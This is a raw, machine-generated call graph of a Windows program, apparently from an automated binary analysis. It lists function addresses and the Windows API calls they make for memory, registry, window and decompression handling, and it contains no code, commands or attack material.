LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53455->53464 53458 46af84 53458->53469 53459 42cb8c 6 API calls 53459->53464 53464->53454 53464->53455 53464->53459 53465 46afd8 53464->53465 53466 46b01a 53464->53466 53464->53469 53470 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53464->53470 53531 4682f0 53464->53531 53539 469f08 53464->53539 53546 469640 53464->53546 53599 469fe8 53464->53599 53637 48146c 53464->53637 53739 46a3e4 19 API calls 53464->53739 53731 457114 53465->53731 53467 469fe8 23 API calls 53466->53467 53467->53469 53469->53435 53470->53464 53472 457114 24 API calls 53472->53466 53740 414af8 53473->53740 53475 46a65a 53476 46a69b 53475->53476 53479 493200 18 API calls 53475->53479 53477 46a6a1 53476->53477 53478 46a6d8 53476->53478 53480 46a6c3 53477->53480 53744 46c45c 53477->53744 53481 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53478->53481 53482 46a70d 53478->53482 53479->53476 53748 414b28 53480->53748 53481->53482 53753 47d508 42 API calls 53482->53753 53487 46a6d6 53491 403400 4 API calls 53487->53491 53488 46a721 53488->53487 53490 414b28 4 API calls 53488->53490 53489 403450 4 API calls 53489->53480 53490->53487 53492 46a766 53491->53492 53492->53436 53766 46b4a8 53493->53766 53496 46aa5a 53498 403420 4 API calls 53496->53498 53497 414af8 4 API calls 53500 46a926 53497->53500 53499 46aa74 53498->53499 53501 403400 4 API calls 53499->53501 53526 46aa46 53500->53526 53769 4554a0 13 API calls 53500->53769 53502 46aa7c 53501->53502 53505 403400 4 API calls 53502->53505 53504 403450 4 API calls 53504->53496 53507 46aa84 53505->53507 53506 46a944 53527 46a9a9 53506->53527 53770 465d14 53506->53770 53507->53436 53509 42cd14 7 API calls 53512 46aa1f 53509->53512 53519 450ab8 4 API calls 53512->53519 53512->53526 53516 465d14 19 API calls 53518 46a984 53516->53518 53774 450a88 53518->53774 53522 46aa36 53519->53522 53520 46aa09 53520->53496 53520->53509 53520->53526 53786 47d508 42 API calls 53522->53786 53526->53496 53526->53504 53527->53496 53527->53520 53779 42cd14 53527->53779 53529 4682f0 19 API calls 53528->53529 53530 4683c3 53529->53530 53530->53451 53532 46831f 53531->53532 53533 4078fc 19 API calls 53532->53533 53536 468360 53532->53536 53534 468358 53533->53534 54005 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53534->54005 53537 403400 4 API calls 53536->53537 53538 468378 53537->53538 53538->53464 53540 469f14 53539->53540 53541 469f19 53539->53541 53542 469f17 53540->53542 54006 469974 53540->54006 54091 4691c0 46 API calls 53541->54091 53542->53464 53544 469f21 53544->53464 53547 403400 4 API calls 53546->53547 53548 46966d 53547->53548 54441 47c564 53548->54441 53550 469692 53551 469696 53550->53551 53552 4696ac 53550->53552 54459 465f14 53551->54459 53554 4696a0 53552->53554 54462 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53552->54462 53557 469771 53554->53557 53558 4697dc 53554->53558 53598 4698a5 53554->53598 53556 403420 4 API calls 53560 4698e1 53556->53560 53561 403494 4 API calls 53557->53561 53562 403494 4 API calls 53558->53562 53559 4696c8 53559->53554 53563 4696d0 53559->53563 53560->53464 53564 46977e 53561->53564 53565 4697e9 53562->53565 53566 469fe8 23 API calls 53563->53566 53568 40357c 4 API calls 53564->53568 53569 40357c 4 API calls 53565->53569 53567 4696dd 53566->53567 54463 42f3d4 53567->54463 53571 46978b 53568->53571 53572 4697f6 53569->53572 53574 40357c 4 API calls 53571->53574 53575 40357c 4 API calls 53572->53575 53578 469798 53574->53578 53576 469803 53575->53576 53580 40357c 4 API calls 53576->53580 53579 40357c 4 API calls 53578->53579 53582 4697a5 53579->53582 53583 469810 53580->53583 53581 469724 53581->53464 53584 465f14 20 API calls 53582->53584 53585 40357c 4 API calls 53583->53585 53586 4697b3 53584->53586 53587 46981e 53585->53587 53588 40357c 4 API calls 53586->53588 53589 414b28 4 API calls 53587->53589 53590 4697bc 53588->53590 53591 4697da 53589->53591 53592 40357c 4 API calls 53590->53592 54480 46624c 53591->54480 53594 4697c9 53592->53594 53595 414b28 4 API calls 53594->53595 53595->53591 53598->53556 53600 4682f0 19 API calls 53599->53600 53602 46a000 53600->53602 53601 46a034 54642 4649f4 53601->54642 53602->53601 53603 4649f4 7 API calls 53602->53603 53603->53601 53607 46a04c 53609 46a133 53607->53609 53610 46a09a 53607->53610 54663 469f9c 19 API calls 53607->54663 53612 46a1f2 GetSystemMenu EnableMenuItem 53609->53612 53611 4682f0 19 API calls 53610->53611 53611->53609 53613 414b28 4 API calls 53612->53613 53614 46a212 53613->53614 53615 46a21e 53614->53615 53616 46a248 53614->53616 53617 414b28 4 API calls 53615->53617 53619 46a264 53616->53619 53620 46a28e 53616->53620 53618 46a232 53617->53618 53621 414b28 4 API calls 53618->53621 53622 414b28 4 API calls 53619->53622 53623 414b28 4 API calls 53620->53623 53624 46a246 53621->53624 53625 46a278 53622->53625 53626 46a2a2 53623->53626 54659 469f30 53624->54659 53627 414b28 4 API calls 53625->53627 53628 414b28 4 API calls 53626->53628 53627->53624 53628->53624 53632 4683b4 19 API calls 53635 46a340 53632->53635 53633 46a2e0 53633->53632 53634 46a3a3 53634->53464 53635->53634 54665 49314c 18 API calls 53635->54665 53638 46b4a8 47 API calls 53637->53638 53639 4814af 53638->53639 53640 4814b8 53639->53640 54865 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53639->54865 53642 414af8 4 API calls 53640->53642 53643 4814c8 53642->53643 53644 403450 4 API calls 53643->53644 53645 4814d5 53644->53645 54685 46b7b8 53645->54685 53648 4814e5 53649 414af8 4 API calls 53648->53649 53651 4814f5 53649->53651 53652 403450 4 API calls 53651->53652 53653 481502 53652->53653 53654 468fa8 SendMessageA 53653->53654 53655 48151b 53654->53655 53656 481559 53655->53656 54867 478a14 23 API calls 53655->54867 53658 4241ec 11 API calls 53656->53658 53659 481563 53658->53659 53660 481589 53659->53660 53661 481574 SetActiveWindow 53659->53661 54714 480a68 53660->54714 53661->53660 53708->53436 53709->53436 53710->53436 56585 43d21c 53711->56585 53714 49322c 56590 431424 53714->56590 53715 4932b2 53716 4932c1 53715->53716 56623 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53715->56623 53716->53464 53725 493276 56621 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53725->56621 53727 49328a 56622 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53727->56622 53729 4932aa 53729->53464 53730->53458 53732 457139 53731->53732 53733 457159 53732->53733 53734 4078fc 19 API calls 53732->53734 53736 403400 4 API calls 53733->53736 53735 457151 53734->53735 53737 456f08 24 API calls 53735->53737 53738 45716e 53736->53738 53737->53733 53738->53472 53739->53464 53741 414b06 53740->53741 53742 4034e0 4 API calls 53741->53742 53743 414b13 53742->53743 53743->53475 53745 46a6b6 53744->53745 53746 46c465 53744->53746 53745->53489 53754 46c53c 53746->53754 53749 414af8 4 API calls 53748->53749 53750 414b4c 53749->53750 53751 403400 4 API calls 53750->53751 53752 414b7d 53751->53752 53752->53487 53753->53488 53755 46c543 53754->53755 53758 45cf00 53755->53758 53759 45cf0b 53758->53759 53760 45cf26 VirtualAlloc 53759->53760 53761 45cf45 53760->53761 53762 45cf4a BZ2_bzDecompressInit 53760->53762 53761->53762 53765 45ce5c 19 API calls 53762->53765 53764 45cf8f 53764->53745 53765->53764 53787 46b534 53766->53787 53769->53506 53772 465d2e 53770->53772 53956 4078fc 53772->53956 53775 450aa8 53774->53775 53975 450960 53775->53975 53999 42cc98 53779->53999 53782 450ab8 53783 450a88 4 API calls 53782->53783 53784 450ad4 53783->53784 53785 47d508 42 API calls 53784->53785 53785->53520 53786->53526 53788 414af8 4 API calls 53787->53788 53789 46b566 53788->53789 53841 465fac 53789->53841 53792 414b28 4 API calls 53793 46b578 53792->53793 53794 46b587 53793->53794 53796 46b5a0 53793->53796 53890 47d508 42 API calls 53794->53890 53799 46b5e7 53796->53799 53801 46b5ce 53796->53801 53797 403420 4 API calls 53798 46a90a 53797->53798 53798->53496 53798->53497 53800 46b64c 53799->53800 53809 46b5eb 53799->53809 53893 42cb18 CharNextA 53800->53893 53891 47d508 42 API calls 53801->53891 53804 46b65b 53805 46b65f 53804->53805 53810 46b678 53804->53810 53894 47d508 42 API calls 53805->53894 53807 46b633 53892 47d508 42 API calls 53807->53892 53809->53807 53809->53810 53811 46b69c 53810->53811 53850 46611c 53810->53850 53895 47d508 42 API calls 53811->53895 53817 46b6b5 53818 403778 4 API calls 53817->53818 53819 46b6cb 53818->53819 53858 42c968 53819->53858 53822 46b6dc 53896 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53822->53896 53823 46b70a 53824 42c898 5 API calls 53823->53824 53826 46b715 53824->53826 53862 42c40c 53826->53862 53827 46b6ef 53829 450ab8 4 API calls 53827->53829 53831 46b6fc 53829->53831 53830 46b720 53872 42cb8c 53830->53872 53897 47d508 42 API calls 53831->53897 53835 46b59b 53835->53797 53846 465fc6 53841->53846 53842 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53842->53846 53844 42cb8c 6 API calls 53844->53846 53845 403450 4 API calls 53845->53846 53846->53842 53846->53844 53846->53845 53847 46600f 53846->53847 53899 42ca78 53846->53899 53848 403420 4 API calls 53847->53848 53849 466029 53848->53849 53849->53792 53852 466126 53850->53852 53851 466139 53851->53811 53854 46614c 53851->53854 53852->53851 53929 42cb08 CharNextA 53852->53929 53856 466156 53854->53856 53855 466183 53855->53811 53855->53817 53856->53855 53930 42cb08 CharNextA 53856->53930 53859 42c9c1 53858->53859 53860 42c97e 53858->53860 53859->53822 53859->53823 53860->53859 53931 42cb08 CharNextA 53860->53931 53863 42c416 53862->53863 53864 42c439 53862->53864 53932 42c948 CharPrevA 53863->53932 53865 403494 4 API calls 53864->53865 53867 42c442 53865->53867 53867->53830 53868 42c41d 53868->53864 53869 42c428 53868->53869 53933 4035c0 53869->53933 53871 42c436 53871->53830 53873 42c648 IsDBCSLeadByte 53872->53873 53876 42cb9d 53873->53876 53874 42cbc4 53876->53874 53955 42cb10 CharPrevA 53876->53955 53890->53835 53891->53835 53892->53835 53893->53804 53894->53835 53895->53835 53896->53827 53897->53835 53900 403494 4 API calls 53899->53900 53901 42ca88 53900->53901 53906 42cabe 53901->53906 53908 403744 53901->53908 53912 42c454 IsDBCSLeadByte 53901->53912 53904 42cb02 53904->53846 53906->53904 53913 4037b8 53906->53913 53918 42c454 IsDBCSLeadByte 53906->53918 53909 40374a 53908->53909 53911 40375b 53908->53911 53910 4034bc 4 API calls 53909->53910 53909->53911 53910->53911 53911->53901 53912->53901 53914 403744 4 API calls 53913->53914 53916 4037c6 53914->53916 53915 4037fc 53915->53906 53916->53915 53919 4038a4 53916->53919 53918->53906 53920 4038b1 53919->53920 53927 4038e1 53919->53927 53922 4038da 53920->53922 53925 4038bd 53920->53925 53921 403400 4 API calls 53924 4038cb 53921->53924 53923 4034bc 4 API calls 53922->53923 53923->53927 53924->53915 53928 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53925->53928 53927->53921 53928->53924 53929->53852 53930->53856 53931->53860 53932->53868 53934 4035c4 53933->53934 53940 40357c 53933->53940 53935 403450 53934->53935 53936 4035e2 53934->53936 53937 4035d4 53934->53937 53934->53940 53939 4034bc 4 API calls 53935->53939 53944 403464 53935->53944 53943 4034bc 4 API calls 53936->53943 53942 403450 4 API calls 53937->53942 53939->53944 53940->53935 53941 4035bf 53940->53941 53945 40358a 53940->53945 53941->53871 53942->53940 53946 4035b4 53945->53946 53947 40359d 53945->53947 53955->53876 53959 407910 53956->53959 53960 40792d 53959->53960 53967 4075c0 53960->53967 53963 407959 53965 4034e0 4 API calls 53963->53965 53966 40790b 53965->53966 53966->53516 53970 4075db 53967->53970 53968 4075ed 53968->53963 53972 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53968->53972 53970->53968 53973 4076e2 19 API calls 53970->53973 53974 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53970->53974 53972->53963 53973->53970 53974->53970 53976 403400 4 API calls 53975->53976 53978 450991 53976->53978 53984 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53978->53984 53984->53978 54000 42cb8c 6 API calls 53999->54000 54001 42ccba 54000->54001 54002 42ccc2 GetFileAttributesA 54001->54002 54003 403400 4 API calls 54002->54003 54004 42ccdf 54003->54004 54004->53520 54004->53782 54005->53536 54008 4699bb 54006->54008 54007 469e33 54009 469e4e 54007->54009 54010 469e7f 54007->54010 54008->54007 54011 469a76 54008->54011 54015 403494 4 API calls 54008->54015 54014 403494 4 API calls 54009->54014 54012 403494 4 API calls 54010->54012 54013 469a97 54011->54013 54017 469ad8 54011->54017 54016 469e8d 54012->54016 54018 403494 4 API calls 54013->54018 54019 469e5c 54014->54019 54020 4699fa 54015->54020 54113 46889c 12 API calls 54016->54113 54021 403400 4 API calls 54017->54021 54023 469aa5 54018->54023 54112 46889c 12 API calls 54019->54112 54025 414af8 4 API calls 54020->54025 54026 469ad6 54021->54026 54027 414af8 4 API calls 54023->54027 54029 469a1b 54025->54029 54049 469bbc 54026->54049 54092 468fa8 54026->54092 54031 469ac6 54027->54031 54028 469e6a 54030 403400 4 API calls 54028->54030 54032 403634 4 API calls 54029->54032 54034 469eb0 54030->54034 54036 403634 4 API calls 54031->54036 54037 469a2b 54032->54037 54041 403400 4 API calls 54034->54041 54035 469c44 54039 403400 4 API calls 54035->54039 54036->54026 54038 414af8 4 API calls 54037->54038 54042 469a3f 54038->54042 54043 469c42 54039->54043 54040 469af8 54044 469b36 54040->54044 54045 469afe 54040->54045 54046 469eb8 54041->54046 54042->54011 54051 414af8 4 API calls 54042->54051 54107 4693e4 43 API calls 54043->54107 54050 403400 4 API calls 54044->54050 54047 403494 4 API calls 54045->54047 54048 403420 4 API calls 54046->54048 54052 469b0c 54047->54052 54053 469ec5 54048->54053 54049->54035 54054 469c03 54049->54054 54055 469b34 54050->54055 54056 469a66 54051->54056 54098 47ad88 54052->54098 54053->53542 54059 403494 4 API calls 54054->54059 54101 46929c 54055->54101 54060 403634 4 API calls 54056->54060 54063 469c11 54059->54063 54060->54011 54061 469c6d 54070 469cce 54061->54070 54071 469c78 54061->54071 54062 469b24 54065 403634 4 API calls 54062->54065 54066 414af8 4 API calls 54063->54066 54065->54055 54067 469c32 54066->54067 54069 403634 4 API calls 54067->54069 54068 469b5d 54074 469bbe 54068->54074 54075 469b68 54068->54075 54069->54043 54072 403400 4 API calls 54070->54072 54073 403494 4 API calls 54071->54073 54076 469cd6 54072->54076 54080 469c86 54073->54080 54077 403400 4 API calls 54074->54077 54078 403494 4 API calls 54075->54078 54079 469ccc 54076->54079 54090 469d7f 54076->54090 54077->54049 54083 469b76 54078->54083 54079->54076 54108 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54079->54108 54080->54076 54080->54079 54085 403634 4 API calls 54080->54085 54082 469cf9 54082->54090 54109 49339c 18 API calls 54082->54109 54083->54049 54086 403634 4 API calls 54083->54086 54085->54080 54086->54083 54088 469e20 54111 429154 SendMessageA SendMessageA 54088->54111 54110 429104 SendMessageA 54090->54110 54091->53544 54114 42a050 SendMessageA 54092->54114 54094 468fb7 54095 468fd7 54094->54095 54115 42a050 SendMessageA 54094->54115 54095->54040 54097 468fc7 54097->54040 54116 47ada8 54098->54116 54106 4692c9 54101->54106 54102 46932b 54103 403400 4 API calls 54102->54103 54104 469340 54103->54104 54104->54068 54106->54102 54440 469220 43 API calls 54106->54440 54107->54061 54108->54082 54109->54090 54110->54088 54111->54007 54112->54028 54113->54028 54114->54094 54115->54097 54117 403494 4 API calls 54116->54117 54121 47addb 54117->54121 54118 47aee0 54119 403420 4 API calls 54118->54119 54120 47ada3 54119->54120 54120->54062 54121->54118 54123 403778 4 API calls 54121->54123 54127 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54121->54127 54128 479cfc 54121->54128 54360 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54121->54360 54361 403800 54121->54361 54365 42c948 CharPrevA 54121->54365 54123->54121 54127->54121 54129 479d4e 54128->54129 54132 479d2c 54128->54132 54130 479d6e 54129->54130 54131 479d5c 54129->54131 54135 479dd1 54130->54135 54136 479d7c 54130->54136 54133 403494 4 API calls 54131->54133 54132->54129 54370 478c2c 19 API calls 54132->54370 54228 479d69 54133->54228 54146 479df2 54135->54146 54147 479ddf 54135->54147 54138 479d85 54136->54138 54139 479dab 54136->54139 54137 403400 4 API calls 54140 47a67c 54137->54140 54141 479d98 54138->54141 54371 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54138->54371 54142 479dbe 54139->54142 54372 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54139->54372 54144 403400 4 API calls 54140->54144 54149 403494 4 API calls 54141->54149 54145 403494 4 API calls 54142->54145 54150 47a684 54144->54150 54145->54228 54152 479e13 54146->54152 54153 479e00 54146->54153 54151 403494 4 API calls 54147->54151 54149->54228 54150->54121 54151->54228 54155 479e63 54152->54155 54156 479e21 54152->54156 54154 403494 4 API calls 54153->54154 54154->54228 54161 479e84 54155->54161 54162 479e71 54155->54162 54157 479e3d 54156->54157 54158 479e2a 54156->54158 54160 479e50 54157->54160 54373 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54157->54373 54159 403494 4 API calls 54158->54159 54159->54228 54164 403494 4 API calls 54160->54164 54166 479ea5 54161->54166 54167 479e92 54161->54167 54165 403494 4 API calls 54162->54165 54164->54228 54165->54228 54169 479ec6 54166->54169 54170 479eb3 54166->54170 54168 403494 4 API calls 54167->54168 54168->54228 54172 479ee7 54169->54172 54173 479ed4 54169->54173 54171 403494 4 API calls 54170->54171 54171->54228 54175 479ef5 54172->54175 54176 479f24 54172->54176 54174 403494 4 API calls 54173->54174 54174->54228 54177 479f11 54175->54177 54178 479efe 54175->54178 54181 479f32 54176->54181 54182 479f61 54176->54182 54180 403494 4 API calls 54177->54180 54179 403494 4 API calls 54178->54179 54179->54228 54180->54228 54183 479f4e 54181->54183 54184 479f3b 54181->54184 54187 479f82 54182->54187 54188 479f6f 54182->54188 54228->54137 54360->54121 54362 403804 54361->54362 54364 40382f 54361->54364 54363 4038a4 4 API calls 54362->54363 54363->54364 54364->54121 54365->54121 54370->54132 54371->54141 54372->54142 54373->54160 54440->54106 54442 47c592 54441->54442 54446 47c5c8 54441->54446 54484 455228 54442->54484 54443 403420 4 API calls 54444 47c6dc 54443->54444 54444->53550 54446->54443 54447 47c6a5 54447->53550 54448 47c5bc 54448->54446 54448->54447 54451 47ad88 43 API calls 54448->54451 54456 47c651 54448->54456 54491 478218 54448->54491 54502 47830c 54448->54502 54506 47c12c 31 API calls 54448->54506 54451->54448 54452 47ad88 43 API calls 54452->54456 54454 42c8f8 5 API calls 54454->54456 54455 42c920 5 API calls 54455->54456 54456->54448 54456->54452 54456->54454 54456->54455 54458 47c692 54456->54458 54507 47c274 58 API calls 54456->54507 54458->54446 54569 465e28 54459->54569 54462->53559 54464 42f3e0 54463->54464 54465 42f403 GetActiveWindow GetFocus 54464->54465 54466 41eeb4 2 API calls 54465->54466 54467 42f41a 54466->54467 54468 42f437 54467->54468 54469 42f427 RegisterClassA 54467->54469 54470 42f4c6 SetFocus 54468->54470 54471 42f445 CreateWindowExA 54468->54471 54469->54468 54473 403400 4 API calls 54470->54473 54471->54470 54472 42f478 54471->54472 54600 42428c 54472->54600 54475 42f4e2 54473->54475 54479 49339c 18 API calls 54475->54479 54476 42f4a0 54477 42f4a8 CreateWindowExA 54476->54477 54477->54470 54478 42f4be ShowWindow 54477->54478 54478->54470 54479->53581 54606 44ad68 54480->54606 54485 455239 54484->54485 54486 455246 54485->54486 54487 45523d 54485->54487 54516 45500c 29 API calls 54486->54516 54508 454f2c 54487->54508 54490 455243 54490->54448 54492 47822e 54491->54492 54493 47822a 54491->54493 54494 403450 4 API calls 54492->54494 54493->54448 54495 47823b 54494->54495 54496 478241 54495->54496 54497 47825b 54495->54497 54545 4780d8 54496->54545 54499 4780d8 19 API calls 54497->54499 54500 478257 54499->54500 54501 403400 4 API calls 54500->54501 54501->54493 54504 478318 54502->54504 54503 478333 54503->54448 54504->54503 54568 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54504->54568 54506->54448 54507->54456 54517 42dd44 54508->54517 54510 454f49 54511 454f97 54510->54511 54520 454e60 54510->54520 54511->54490 54514 454e60 6 API calls 54515 454f78 RegCloseKey 54514->54515 54515->54490 54516->54490 54518 42dd55 RegOpenKeyExA 54517->54518 54519 42dd4f 54517->54519 54518->54510 54519->54518 54525 42dc80 54520->54525 54522 403420 4 API calls 54523 454f12 54522->54523 54523->54514 54524 454e88 54524->54522 54528 42db28 54525->54528 54529 42db4e RegQueryValueExA 54528->54529 54535 42db71 54529->54535 54544 42db93 54529->54544 54530 403400 4 API calls 54532 42dc5f 54530->54532 54531 42db8b 54533 403400 4 API calls 54531->54533 54532->54524 54533->54544 54534 4034e0 4 API calls 54534->54535 54535->54531 54535->54534 54536 403744 4 API calls 54535->54536 54535->54544 54537 42dbc8 RegQueryValueExA 54536->54537 54537->54529 54538 42dbe4 54537->54538 54539 4038a4 4 API calls 54538->54539 54538->54544 54540 42dc26 54539->54540 54541 42dc38 54540->54541 54543 403744 4 API calls 54540->54543 54542 403450 4 API calls 54541->54542 54542->54544 54543->54541 54544->54530 54546 4780f3 54545->54546 54547 4781b2 54546->54547 54550 478124 54546->54550 54563 477f8c 19 API calls 54546->54563 54547->54500 54549 478149 54553 47816a 54549->54553 54565 477f8c 19 API calls 54549->54565 54550->54549 54564 477f8c 19 API calls 54550->54564 54553->54547 54554 4781aa 54553->54554 54566 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54553->54566 54557 477e10 54554->54557 54558 477e4b 54557->54558 54559 403450 4 API calls 54558->54559 54560 477e70 54559->54560 54567 476500 19 API calls 54560->54567 54562 477eb1 54562->54547 54563->54550 54564->54549 54565->54553 54566->54554 54567->54562 54568->54503 54570 403494 4 API calls 54569->54570 54571 465e56 54570->54571 54586 42daf0 54571->54586 54574 42daf0 5 API calls 54575 465e7a 54574->54575 54576 465d14 19 API calls 54575->54576 54577 465e84 54576->54577 54578 42daf0 5 API calls 54577->54578 54579 465e93 54578->54579 54589 465d8c 54579->54589 54582 42daf0 5 API calls 54583 465eac 54582->54583 54584 403400 4 API calls 54583->54584 54585 465ec1 54584->54585 54585->53554 54593 42da38 54586->54593 54590 465dac 54589->54590 54591 4078fc 19 API calls 54590->54591 54592 465df6 54591->54592 54592->54582 54594 42dae3 54593->54594 54595 42da58 54593->54595 54594->54574 54595->54594 54596 4037b8 4 API calls 54595->54596 54598 403800 4 API calls 54595->54598 54599 42c454 IsDBCSLeadByte 54595->54599 54596->54595 54598->54595 54599->54595 54601 4242be 54600->54601 54602 42429e GetWindowTextA 54600->54602 54604 403494 4 API calls 54601->54604 54603 4034e0 4 API calls 54602->54603 54605 4242bc 54603->54605 54604->54605 54605->54476 54609 44abe0 54606->54609 54610 44ac13 54609->54610 54611 414af8 4 API calls 54610->54611 54612 44ac26 54611->54612 54613 44ac53 73A0A570 54612->54613 54614 40357c 4 API calls 54612->54614 54620 41a1f8 54613->54620 54614->54613 54621 41a223 54620->54621 54622 41a2bf 54620->54622 54639 403520 54621->54639 54623 403400 4 API calls 54622->54623 54624 41a2d7 SelectObject 54623->54624 54640 4034e0 4 API calls 54639->54640 54644 4649ff 54642->54644 54643 464ada 54653 4667a4 54643->54653 54644->54643 54648 464a4f 54644->54648 54666 421a2c 54644->54666 54645 464a92 54645->54643 54672 4185c8 7 API calls 54645->54672 54648->54645 54649 464a94 54648->54649 54650 464a89 54648->54650 54651 421a2c 7 API calls 54649->54651 54652 421a2c 7 API calls 54650->54652 54651->54645 54652->54645 54654 4667d4 54653->54654 54655 4667b5 54653->54655 54654->53607 54656 414b28 4 API calls 54655->54656 54657 4667c3 54656->54657 54658 414b28 4 API calls 54657->54658 54658->54654 54660 469f3d 54659->54660 54661 421a2c 7 API calls 54660->54661 54662 469f96 54661->54662 54662->53633 54664 466274 18 API calls 54662->54664 54663->53610 54664->53633 54665->53634 54667 421a84 54666->54667 54670 421a3a 54666->54670 54667->54648 54668 421a69 54668->54667 54681 421d38 SetFocus GetFocus 54668->54681 54670->54668 54673 408cc4 54670->54673 54672->54643 54674 408cd0 54673->54674 54682 406df4 LoadStringA 54674->54682 54677 403450 4 API calls 54678 408d01 54677->54678 54679 403400 4 API calls 54678->54679 54680 408d16 54679->54680 54680->54668 54681->54667 54683 4034e0 4 API calls 54682->54683 54684 406e21 54683->54684 54684->54677 54686 46b7e1 54685->54686 54687 46b82e 54686->54687 54688 414af8 4 API calls 54686->54688 54689 403420 4 API calls 54687->54689 54690 46b7f7 54688->54690 54692 46b8d8 54689->54692 54873 466038 6 API calls 54690->54873 54692->53648 54866 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54692->54866 54693 46b7ff 54694 414b28 4 API calls 54693->54694 54695 46b80d 54694->54695 54696 46b81a 54695->54696 54698 46b833 54695->54698 54874 47d508 42 API calls 54696->54874 54699 46b84b 54698->54699 54701 46611c CharNextA 54698->54701 54875 47d508 42 API calls 54699->54875 54702 46b847 54701->54702 54702->54699 54703 46b861 54702->54703 54704 46b867 54703->54704 54705 46b87d 54703->54705 54876 47d508 42 API calls 54704->54876 54707 42c968 CharNextA 54705->54707 54708 46b88a 54707->54708 54708->54687 54877 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54708->54877 54710 46b8a1 54711 450ab8 4 API calls 54710->54711 54712 46b8ae 54711->54712 54878 47d508 42 API calls 54712->54878 54715 480ab9 54714->54715 54716 480a8b 54714->54716 54718 4749c8 54715->54718 54879 49314c 18 API calls 54716->54879 54880 456f08 54718->54880 54721 4072b0 SetCurrentDirectoryA 54722 474a1e 54721->54722 54901 46d33c 54722->54901 54867->53656 54873->54693 54874->54687 54875->54687 54876->54687 54877->54710 54878->54687 54879->54715 54881 456f34 54880->54881 54896 45703c 54880->54896 55421 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54881->55421 54882 45708d 54885 403400 4 API calls 54882->54885 54887 4570a2 54885->54887 54886 456f3c 54888 4078fc 19 API calls 54886->54888 54887->54721 54889 456fad 54888->54889 55422 456ef8 20 API calls 54889->55422 54896->54882 55425 456774 6 API calls 54896->55425 55421->54886 55425->54882 56624 431740 56585->56624 56587 403400 4 API calls 56588 43d2ca 56587->56588 56588->53714 56588->53715 56589 43d246 56589->56587 56591 43142a 56590->56591 56592 402648 4 API calls 56591->56592 56593 43145a 56592->56593 56594 492c58 56593->56594 56595 492d2d 56594->56595 56599 492c72 56594->56599 56601 492d70 56595->56601 56596 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56596->56599 56599->56595 56599->56596 56600 403450 4 API calls 56599->56600 56629 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56599->56629 56630 4314f4 56599->56630 56600->56599 56602 492d8c 56601->56602 56638 4335c0 56602->56638 56604 492d91 56605 4314f4 4 API calls 56604->56605 56606 492d9c 56605->56606 56607 43cde8 56606->56607 56608 43ce15 56607->56608 56613 43ce07 56607->56613 56608->53725 56609 43ce91 56617 43cf4b 56609->56617 56641 4468d8 56609->56641 56611 43cedc 56647 43d5a4 56611->56647 56613->56608 56613->56609 56614 4468d8 4 API calls 56613->56614 56614->56613 56615 43d151 56615->56608 56667 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56615->56667 56617->56615 56618 43d132 56617->56618 56665 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56617->56665 56666 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56618->56666 56621->53727 56622->53729 56623->53716 56625 403494 4 API calls 56624->56625 56627 43174f 56625->56627 56626 431779 56626->56589 56627->56626 56628 403744 4 API calls 56627->56628 56628->56627 56629->56599 56631 431502 56630->56631 56632 431514 56630->56632 56636 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56631->56636 56633 431536 56632->56633 56637 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56632->56637 56633->56599 56636->56632 56637->56633 56639 402648 4 API calls 56638->56639 56640 4335cf 56639->56640 56640->56604 56642 4468f7 56641->56642 56643 4468fe 56641->56643 56668 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56642->56668 56645 4314f4 4 API calls 56643->56645 56646 44690e 56645->56646 56646->56611 56648 43d5c0 56647->56648 56661 43d5ed 56647->56661 56649 402660 4 API calls 56648->56649 56648->56661 56649->56648 56650 43d622 56650->56617 56652 43f6f9 56652->56650 56678 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56652->56678 56654 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56654->56661 56658 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56658->56661 56659 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56659->56661 56660 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56660->56661 56661->56650 56661->56652 56661->56654 56661->56658 56661->56659 56661->56660 56662 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->56662 56663 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->56663 56664 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->56664 56669 438f34 56661->56669 56675 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->56675 56676 43d49c 18 API calls 56661->56676 56677 433588 